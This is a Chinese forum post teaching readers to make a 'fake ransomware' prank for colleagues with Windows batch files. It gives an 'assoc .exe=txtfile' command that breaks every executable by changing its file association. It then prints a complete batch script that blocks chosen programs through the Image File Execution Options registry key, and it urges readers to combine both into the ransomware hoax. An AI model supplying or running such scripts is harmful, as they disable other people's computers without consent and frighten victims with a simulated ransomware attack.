用bat制作“假勒索”整蛊同事-CFANZ编程社区

愚人节快到了，相信大家对bat都不陌生。bat整人大家也应该也熟悉

今天，我教大家用bat制作假勒索。放心，它不会加密文件。

我们要用到文件关联

assoc.xxx=yyyfile

xxx是原始文件扩展名yyy是你要更改的文件扩展名，通过错误的关联，会让文件类似被加密

下面是一个示范

assoc.exe=txtfile

执行这条命令后，你的电脑会把所有exe格式的文件以TXT格式打开，恢复很简单，倒过来就好了

光有这个改扩展名还不够吓人，下面我们来介绍镜像劫持

这里我写了一个用镜像劫持禁止文件的bat仅供

@echo off
MODE con COLS=40 LINES=18
title 禁止和解除指定程序运行
:begin
setlocal ENABLEDELAYEDEXPANSION
cls
echo.
echo.         ╭─────────╮
echo. ╭───┤   选择如下操作   ├───╮
echo. │      ╰─────────╯      │
echo. │                                  │
echo. │       A.添加要禁止的程序         │
echo. │                                  │
echo. │       B.删除已禁止的程序         │
echo. │                                  │
echo. │       C.查看全部禁止的程序       │
echo. │                                  │
echo. │          Z.退出程序              │
echo. │                                  │
echo. ╰─────────────────╯
echo.
copy %systemdrive%\WINDOWS\jzcx %systemdrive%\WINDOWS\jzcx.txt>nul
set /p enter=     请你输入你的选择:
if not "%enter%"=="" set enter=%enter:~0,1%
if /i "%enter%"=="A" goto jinzhiadd
if /i "%enter%"=="B" goto jinzhidel
if /i "%enter%"=="C" goto jinzhick
if /i "%enter%"=="Z" goto exit
goto begin
:jinzhiadd
cls
echo.
echo.
echo.  输入要禁止的程序：按 Y 返回菜单
echo.
set /p input=     
if /i "%input%"=="Y" goto begin
echo      %input%>>%systemdrive%\WINDOWS\jzcx.txt
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\%input%" /v debugger /t reg_sz /d debugfile.exe /f
echo.
echo.     成功添加要禁止的程序  %input%
echo.
echo.        任意键，返回其他操作
copy %systemdrive%\WINDOWS\jzcx.txt %systemdrive%\WINDOWS\jzcx>nul
pause>nul
goto begin
:jinzhidel
cls
echo.
echo.
echo.
echo.
echo.          全部禁止的程序如下：
echo   -------------------------------
echo.
type %systemdrive%\WINDOWS\jzcx.txt
echo.
echo   -------------------------------
echo.
echo.  输入要删除的禁止程序: 按 Y 返回菜单
echo.
set /p jinzhidel=   
if /i "%jinzhidel%"=="Y" goto begin
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\%jinzhidel%" /f
@for /f "tokens=* delims=" %%i in ('findstr /i /v /c:%jinzhidel% %systemdrive%\WINDOWS\jzcx.txt') do (
set var=%%i
echo      !var!>>temp.txt   
)   
copy temp.txt %systemdrive%\WINDOWS\jzcx.txt>nul
del temp.txt 
cls
echo.
echo.
echo.
echo.
echo.           操作完成
echo.
echo.
echo.      任意键，返回其他操作
copy %systemdrive%\WINDOWS\jzcx.txt %systemdrive%\WINDOWS\jzcx>nul
pause>nul
goto begin
:jinzhick
cls
echo.
echo.     全部禁止的程序如下：
echo   --------------------------------
echo.
type  %systemdrive%\WINDOWS\jzcx.txt
echo.
echo   --------------------------------
echo.
echo.          任意键返回其他操作
pause>nul
goto begin

把它加入勒索，完美

感谢支持😁收藏吧！